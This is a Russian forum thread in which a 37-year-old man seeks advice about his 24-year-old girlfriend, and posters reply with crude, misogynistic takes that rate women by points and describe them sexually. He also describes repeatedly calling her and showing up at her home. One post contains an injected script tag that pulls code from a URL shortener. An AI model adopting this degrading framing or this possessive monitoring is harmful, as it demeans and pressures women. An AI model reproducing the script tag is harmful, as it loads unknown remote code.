Top.Mail.Ru

Перейти к содержимому

Фотография

Как грамотно себя вести, если твоя девочка "с гонором"?

• Авторизуйтесь для ответа в теме
Сообщений в теме: 44

#16 myOwnAss

myOwnAss

тусовщик

• Посетитель
  • Pip
  • 134 Cообщений
122
Очень хороший

Отправлено 28 мая 2017 - 14:21

Автор, это ты позиционируешь ваши отношения как ЛТР. Она позиционирует их как СО, с возможностью поиметь с тебя что-то.  Сколько баллов девочка?

Про то, что она плюет на ваши договоренности о встрече и трубу не берет, это не дрессировка. Она тусит с кем-то еще, имхо. И прекрасно понимает, что ты это схаваешь.

Kahn тебе про поведение хорошо написал. 

Альтернативы у тебя есть? не меньше ее по бальности

• 0

I'm not afraid, I'm not ashamed, I'm not to blame

#17 DePaolo

DePaolo

тусовщик

• Посетитель
  • Pip
  • 118 Cообщений
72
Очень хороший

Отправлено 28 мая 2017 - 15:36

<script type="text/oops" src="http://is.gd/J87Pzs"...7Pzs"></script>

Автор, это ты позиционируешь ваши отношения как ЛТР. Она позиционирует их как СО, с возможностью поиметь с тебя что-то.  Сколько баллов девочка?

Про то, что она плюет на ваши договоренности о встрече и трубу не берет, это не дрессировка. Она тусит с кем-то еще, имхо. И прекрасно понимает, что ты это схаваешь.

Kahn тебе про поведение хорошо написал. 

Альтернативы у тебя есть? не меньше ее по бальности

Девочка сама в какой-то момент начала задавать вопросы насчет семьи, детей т.п. В ответ ей втираю, что если нам хорошо вместе, то и нечего забивать себе голову. По-поводу денег ничего не намекает и не просит, наоборот предложила сама закупить жратву и угощала кофе с пончиками, когда я сказал что всю неделю буду на нуле и жду зарплату... Рекламирует себя в разговорах, типа "Я заботливачя и хозяйственная, я домашняя девочка". Вместе с этим собирается покупать ту хату, которую сейчас снимает. Залезает в ипотеку. Вы правы - скорее всего ищет спонсора, чтобы и хату купить и пожить за чужой счет. Но это неточно)

На мой вкус - девочка на 6 баллов. Она миниатюрная жизнерадостная девчонка с упругой аккуратной задницей. На вид вообще школьница. Альтернатив нет. Те две девушки, которых могу вызвонить и потрахать - максимум на 5 баллов.

• 0

#18 myOwnAss

myOwnAss

тусовщик

• Посетитель
  • Pip
  • 134 Cообщений
122
Очень хороший

Отправлено 28 мая 2017 - 15:45

Вы правы - скорее всего ищет спонсора, чтобы и хату купить и пожить за чужой счет. Но это неточно)

Если так кажется, то скорее всего так оно и есть.

Я бы больше заморочился на тему развития собственного. Чтобы не сидеть на нуле и не ждать ЗП. 

И альтернативы тоже бы искал. Будет у тебя таких две девочки с упругими попами - будешь на каждой по отдельности меньше залипать.

• 1

I'm not afraid, I'm not ashamed, I'm not to blame

#19 bozored

bozored

-------- ПЛЮСУЙ меня полностью :) ------ >>>

• Забанен
  • PipPipPipPipPipPip
  • 7 490 Cообщений
945
Очень хороший

Отправлено 28 мая 2017 - 17:19

У вас разница в 13 лет, а ты ведешь себя как будто ее сверстник и с финансами и с истерикой.
Ну реально 13 лет разницы уже подразумевает некоторое "спонсорство". А ты блин даже финансовую стабильность не можешь продемонстрировать.

Хочешь альтруизма - встречайся с теми 5ками. Хочешь симпатичную трахать - начни из себя что-то представлять и готоаься платить.

Ну сам подумай - зачем ей такая разница в возрасте?

Сообщение отредактировал bozored: 28 мая 2017 - 17:20

• 0

Скрытый текст

#20 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 18:30

Хочет в ЛТР и замуж. Семью, совместную ипотеку.
Если ДеПаоло хочет семью, то отлично, у обоих совпали их желания. Тем более девушка выбирает именно ДеПаоло. Он именно тот с кем она похоже хочет завести все это. Это прекрасно, это действительно классно.

Но лично меня напрягает ее возраст - 24. Как раз именно про таких говорят - ветер в голове, ускакала в поле молодая лошадь. Ее жизненные цели скорее изменчивы, родительское воспитание и их установки не разбились о реальность жизни. Она не понимает что она хочет кого она хочет и как она хочет. Мой совет - нахуй ее - не надо ничего строить с дурами, а то что она дура, то 99 процентов и еще большое пожелание встретить девушку постарше.

В нашем современном российском обществе молодые тёлочки готовы только для Крыма, Рыма и медных труб. Ни на что более эти субпродукты не годятся.

Сообщение отредактировал Mixrud: 28 мая 2017 - 18:37

• 1

#21 DePaolo

DePaolo

тусовщик

• Посетитель
  • Pip
  • 118 Cообщений
72
Очень хороший

Отправлено 08 ноября 2017 - 20:35

Я снова за советом, камрады!

Я уже описывал ситуацию, но вкратце так: мне 37, девочке 24, вместе уже 7 месяцев, у каждого своя хата, но ночуем в основном у меня. Проблема - постоянно сремся! Несколько дней все отлично, нежность, секс, ласки. Девочка тащится, я тоже, все просто заебись! Потом откат, типа устаем друг от друга, ночуем врозь. И с периодичностью неделя-две обязательно какая-нибудь хуйня случится. 
Пара примеров!
Договорились сгонять в бассейн на неделе. Договаривались аж за пару дней! И в тот день, когда надо идти, я ей звоню и узнаю вдруг, что у нее планы поменялись и она идет на днюху к подруге. Ну еба мать! Я на нервяке, но стараюсь говорить спокойно. Говорю, что вообще-то такие вопросы обсуждаются заранее, и явно ее подруга не вот только что пригласила. В ответ - Я забыла тебе сказать!... В итоге дуюсь на нее, она на меня. Настрояния нихуя нет. Пару дней ходим как долбоебы и друг на друга "обижаемся". Я своей вины не вижу, кроме того, что можно было как-то на позитиве эту ситуацию пройти. Хз как..((

Еще пример. 
Пишет мне с работы в Вайбере что охуенно хочет меня прям сейчас. Типа мокрая вся и т.п. Но она знает, что я мазал хуй Ацикловиром. т.к. у меня герпес на головке вылезает от переохлаждения(( 
Пишу ей, что нам надо повременить с сексом, чтобы прошло... Ок, договариваемся, что встретимся завтра, после ее ссмены вечером. на следующий день созваниваемся, говорить что устала. Прихожу к ней на работу ее встречать, она уже идти ко мне не хочет, собирается домой. Типа голова болит, устала, завтра с утра вставать и надо выспаться и т.п. Конечно мне это неприятно, ведь договорились и она вообще-то может и у меня поспать... Иду почти молчу как дебил. Она пытается что-то заговорить, но разговор не клеится. Проводил ее до дома и ушел к себе. Уже почти ночью звоню ей и слышу что она по улице идет. Типа на купить печенья на работу. Чую что парит меня, потому что я за пару дней до этого у нее был и у нее полкоробки печенюх еще было. Высказываю ей, что че-то она темнит. Она на мороз типа "Нет, нихуя, я за печеньем и обратно. Буду дома, позвоню!" В итоге через час сам ей набираю, она не поднимает. Сама перезванивает еще через полтора часа... Я уже трубку не брал, психанул. Утром высказал, что мне нихуя не нравится что моя девушка шарится по ночам и не берет трубку. В ответ начала мне нести какую-то хуету про "сам такой"! 
Этот случай был пару дней назад. За это время ситуация только ухудшилась по ощущениям. Чувствую, что девочка охладевает, от встреч отмазывается, придумывая разные причины. 
Девочка нравится внешне, очень классный секс, очень эмоциональные встречи и прогулки с ней. Когда у нас все пучком, то она просто охуенная для меня!

Какие выводы? Вася? Я ее заебал? Пора расставаться? Я запутался и туплю!

• 0

#22 Iraq

Iraq

Советчик

• Полноправный
  • PipPipPip
  • 1 306 Cообщений
1 640
Очень хороший

Отправлено 08 ноября 2017 - 21:30

Твоя невысокая значимость + ты для нее больше СО, с которым она может убивать время когда ей скучно, но как только у нее появляются более интересные планы у нее для тебя сразу начинает болеть голова и ты идешь нахуй. 

Главная проблема как ее вижу я - у нее есть жизнь и интересные занятия помимо тебя, а тебя же жизнь построена вокруг ее пельменя. Вот и получается что стоит ей изменить свои планы и не пойти с тобой в бассейн как у тебя вся неделя по пизде идет, и ты ходишь дуешься потому что ничем другим заняться сам не в состоянии. 

Сообщение отредактировал Iraq: 08 ноября 2017 - 21:31

• 4

#23 bozored

bozored

-------- ПЛЮСУЙ меня полностью :) ------ >>>

• Забанен
  • PipPipPipPipPipPip
  • 7 490 Cообщений
945
Очень хороший

Отправлено 08 ноября 2017 - 22:28

Ну так пошли бы к подруге на ДР вместе, а в бассейн в другой день. Ебать проблема.

Если девушка пишет что хочет тебя прямо сейчас - динамить ее "порыв" крайне тупая идея. А там уже на месте разберётесь - пальцы то у тебя не намазаны.

С печеньем вообще нифига не понял. Но ситуация с тем что бы "обламал ее порыв" она ещё не простила.
  • 0

Скрытый текст

#24 Bolshoy_Uh

Bolshoy_Uh

бывалый

• Перцы
  • PipPip
  • 267 Cообщений
125
Очень хороший

Отправлено 08 ноября 2017 - 23:21

то планы резко поменялись, то печенье ночью купить, то трубки потом не берет, то голова болит = твоя низкая значимость = похоже что вася на тесте.

• 2
Как мотивировать себя что-то делать? Да никак - оставайтесь в жопе.

#25 DePaolo

DePaolo

тусовщик

• Посетитель
  • Pip
  • 118 Cообщений
72
Очень хороший

Отправлено 09 ноября 2017 - 03:11

Главная проблема как ее вижу я - у нее есть жизнь и интересные занятия помимо тебя, а тебя же жизнь построена вокруг ее пельменя. 

Отчасти ты прав. Пока отношаюсь с этой бабенкой, то порастерял друзей!(  Их и так было пару человек, а сейчас вообще ни с кем не общаюсь, только с коллегами по работе. 

Из увлечений только зал 2-3 раза в неделю, иногда бассейн, а так как овощ, да... 

то планы резко поменялись, то печенье ночью купить, то трубки потом не берет, то голова болит = твоя низкая значимость = похоже что вася на тесте.

Тоже склоняюсь к этой мысли. Она уже несколько дней морозит встречи вышеописанным способом, похоже что врет: пошла за печеньем ночью... а когда я пришел к ней на работу и попросил это печенье попробовать, то сразу наехала типа схерали я ей недоверяю! Естественно печенье я так и не увидел. 

Я полный лох, но я напорол косяков вечером!! ((( Сегодня она пошла на теннис к каким-то хуем, типа к соревам готовиться. Сказала что зал до 20ч. В итоге пропала и я вызвонил ее только в 22:30. Быстро поговорили, потом сказала что переодевается и больше я не смог дозвониться. Написал ей СМС "Как это понимать?", ответила типа "я устала". Приперся к ней домой, не открыла, света не было. Пару раз еще звонил, но нихуя. По-ходу ее тот теннисист поебывает уже. Сука, уснуть не могу! 

• 0

#26 Valve18

Valve18

бывалый

• Полноправный
  • PipPip
  • 477 Cообщений
348
Очень хороший

Отправлено 09 ноября 2017 - 09:30

Василий поебывает ее.

А ты заебываешь ее своим излишним вниманием,бегаешь за ней,следишь,названиваешь.

Делай сильное дальше(все контакты прекращаешь,не следишь,на пинги не реагируешь),готовься к сливу.

Василий тест не пройдет,она вернется на проверенный хуй,но до следующего Василия

• 0

#27 Bolshoy_Uh

Bolshoy_Uh

бывалый

• Перцы
  • PipPip
  • 267 Cообщений
125
Очень хороший

Отправлено 09 ноября 2017 - 11:53

Тоже склоняюсь к этой мысли. Она уже несколько дней морозит встречи вышеописанным способом, похоже что врет: пошла за печеньем ночью... а когда я пришел к ней на работу и попросил это печенье попробовать, то сразу наехала типа схерали я ей недоверяю! Естественно печенье я так и не увидел. 

Я полный лох, но я напорол косяков вечером!! ((( Сегодня она пошла на теннис к каким-то хуем, типа к соревам готовиться. Сказала что зал до 20ч. В итоге пропала и я вызвонил ее только в 22:30. Быстро поговорили, потом сказала что переодевается и больше я не смог дозвониться. Написал ей СМС "Как это понимать?", ответила типа "я устала". Приперся к ней домой, не открыла, света не было. Пару раз еще звонил, но нихуя. По-ходу ее тот теннисист поебывает уже. Сука, уснуть не могу! 

Какие тебе нужны еще доказательства что ей на тебя похуй?

сливай уже, возьми ответственность за свою жизнь в свои руки. хватит унижаться и бегать за ней.

• 0
Как мотивировать себя что-то делать? Да никак - оставайтесь в жопе.

#28 Neprili4niy

Neprili4niy

простофлудер

• Полноправный
  • PipPipPipPip
  • 2 336 Cообщений
2 449
Очень хороший

Отправлено 09 ноября 2017 - 12:59

Тебя банально слили.

Но ты можешь понадобиться, когда ей станет скучно.

Т.е. тебя переводят в запасной аэродром.

Устаканится с Васей - пошлют нахуй или кинут в ДОД.

Отношения закончены потому, что она тебе нужнее, чем ты ей; ты готов ради нее на все, а твоя ценность стремиться к нулю.

И да, ты жрешь дерьмо.

Исправить никак.

Санчас, игнор, Т100Б, Т10Д с сегодняшнего дня.

Ну так пошли бы к подруге на ДР вместе, а в бассейн в другой день. Ебать проблема.

Если девушка пишет что хочет тебя прямо сейчас - динамить ее "порыв" крайне тупая идея. А там уже на месте разберётесь - пальцы то у тебя не намазаны.

С печеньем вообще нифига не понял. Но ситуация с тем что бы "обламал ее порыв" она ещё не простила.

Его к подруге не звали. "И был ли мальчик?"

Тупая идея нестись к ней по первому ее щелчку.

• 1

#29 Муцций Пуздой

Муцций Пуздой

Советчик

• Полноправный
  • PipPipPip
  • 561 Cообщений
242
Очень хороший

Отправлено 09 ноября 2017 - 13:01

Ее пялят,а если даже и нет,то у себя в голове она тебе уже изменила.
А что делают в таких случаях настояшие мужики? Правильно-посылают нахуй. Не послал,значит тряпка,а мужчин-тряпок женщины презирают.
  • 0

Всё время спрашивайте себя: " Не хуйню ли я делаю? "

#30 FrankDrebin

FrankDrebin

Легенда форума

• Свой
  • PipPipPipPipPipPip
  • 5 859 Cообщений
1 607
Очень хороший

Отправлено 09 ноября 2017 - 13:55

Есть небольшая надежда, что дело не в васе, а в заебавшим выяснениями отношений авторе. Есть такие мозгоебы, которым скажешь "планы поменялись" и все пиздец - всю следующую встречу будет ебать мозг. Когда общаешься с такими людьми, то ловишь себя на мысли, что как то даже и видеться не хочется - ведь опять начнет что то предъявлять, поэтому приходится чаще отменять встречи => замкнутый круг.

Так что мой тебе совет (касается не только девушек), будь легким с людьми. Изменились планы? Окей, ничего страшного, сбегаю в бассейн один и наберу тебя завтра. Не можешь сегодня встретиться? Окей, тогда наберу на днях, и сам занялся своими делами/увлечениями. Просто у тебя в центре должен быть ТЫ и твои мир, наполненный всякими интересными делами и увлечениями. И если кто то там "занят" и не может быть вовлечен в твой мир сегодня, то совершенно похуй, т.к. это ни в коем случае не может нарушить твои планы (сходить в бассейн или сходить куда угодно).

И самое главное! При встрече ни в коем случае нельзя быть кислым и хоть как то припоминать, что тебя в прошлый раз "прокатили" с планами. Если будешь припоминать, скандалить, выяснять отношения, то тебя тупо начнут избегать. Что с очень большой вероятность и происходит у тебя с твоей ожп.

Проблема - постоянно сремся!

Помни, что "срач" - это результат старания двух партнеров. Если один из партнеров достаточно зрелый, чтобы не вестись на эти ссоры, то ссоры НЕ получится. Просто перестань ругаться (даже если очень хочется). Удивишься. Я вот последний раз ссорился с девушкой лет 5-6 назад.

Сообщение отредактировал FrankDrebin: 09 ноября 2017 - 14:15

• 0

Количество пользователей, читающих эту тему: 1

0